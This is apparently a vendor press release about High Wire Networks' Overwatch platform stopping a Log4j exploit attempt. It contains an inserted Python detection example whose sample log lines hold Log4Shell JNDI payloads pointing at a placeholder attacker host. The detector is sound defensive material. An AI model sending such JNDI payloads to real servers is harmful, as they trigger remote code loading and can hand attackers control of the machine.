A vulnerability in Log4j, a widely used Java-based logging library, allows attackers to execute code remotely on a targeted computer and then steal data, install malware or take control of the machine. The head of the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) calls the exploit “one of the most serious flaws” in the software and says it could have widespread security implications.
On Thursday, Overwatch 24/7, an open XDR (extended detection and response) platform managed by the Overwatch Security Operations Center (SOC), detected traffic coming from a known malicious public IP to the end customer’s network. Overwatch identified the traffic as a Log4j attempted exploit at the firewall, alerted the partner, and stopped it from infiltrating the network.
“During the incident, Overwatch was in close contact with the bank and continued to run scans on the network for the exploit,” according to the partner.
“Our partners also had first-hand knowledge of the Log4j exploitation when we sent out a vulnerability alert with cybersecurity recommendations and put custom detections in place based on published indicators of compromise (IOC),” said High Wire CISO Phil Burnett. “Over the weekend, we also continuously updated our platform with threat detection capabilities by adding detections for the exploitations.”
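The detection described above pairs an indicator match on the source IP with a signature for the exploit attempt itself. The following is an added example, not Overwatch's or High Wire's code, that applies both checks to constructed web-server log lines; the IOC addresses, the log format and the attacker.example host are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IOC list (documentation-range addresses), not the incident's real IP.
KNOWN_MALICIOUS_IPS = {"198.51.100.23", "203.0.113.77"}

# A Log4Shell attempt embeds a JNDI lookup, "${jndi:<scheme>://...}", in any field
# the application might log; it often arrives URL-encoded in the request line.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed log format: <src_ip> "<request line>" <status> "<user-agent>"
LOG_LINE = re.compile(r'^(?P<ip>\S+) "(?P<request>[^"]*)" (?P<status>\d{3}) "(?P<ua>[^"]*)"$')

def url_decode_fully(value, max_rounds=3):
    """Strip successive layers of URL encoding so the pattern check sees plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the detection names that fire on a single log line."""
    match = LOG_LINE.match(line.strip())
    if not match:
        return ["unparsed"]
    hits = []
    if match["ip"] in KNOWN_MALICIOUS_IPS:
        hits.append("ioc-source-ip")          # IOC match: the firewall-level detection
    for field in (match["request"], match["ua"]):
        if JNDI_LOOKUP.search(url_decode_fully(field)):
            hits.append("log4j-jndi-lookup")  # exploit-attempt signature
            break
    return hits

# Constructed sample traffic; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.77 "GET /api/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 "curl/7.68.0"',
    '192.0.2.10 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.23 "GET /health HTTP/1.1" 200 "Mozilla/5.0"',
    '192.0.2.44 "POST /upload HTTP/1.1" 403 "${jndi:rmi://attacker.example/x}"',
]
```

Running `classify` over each line of `SAMPLE_LOG` flags the first line on both checks, the third on the IOC alone and the fourth on the signature alone, which is why a signature check is still needed for traffic from addresses not yet on any published IOC list.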
Overwatch 24/7 is the centerpiece of High Wire Networks’ Managed Security Services Marketplace, which offers organizations end-to-end protection for networks, endpoints, cloud, physical, perimeter, applications, and users. With an affordable subscription, Overwatch security experts monitor, detect, and respond to threats around the clock, delivering defense in depth for managed service provider (MSP) partners and their customers.
Ask us how we can deliver end-to-end cybersecurity and drill down on real threats for your business and clients: https://www.highwirenetworks.com/overwatch/demo/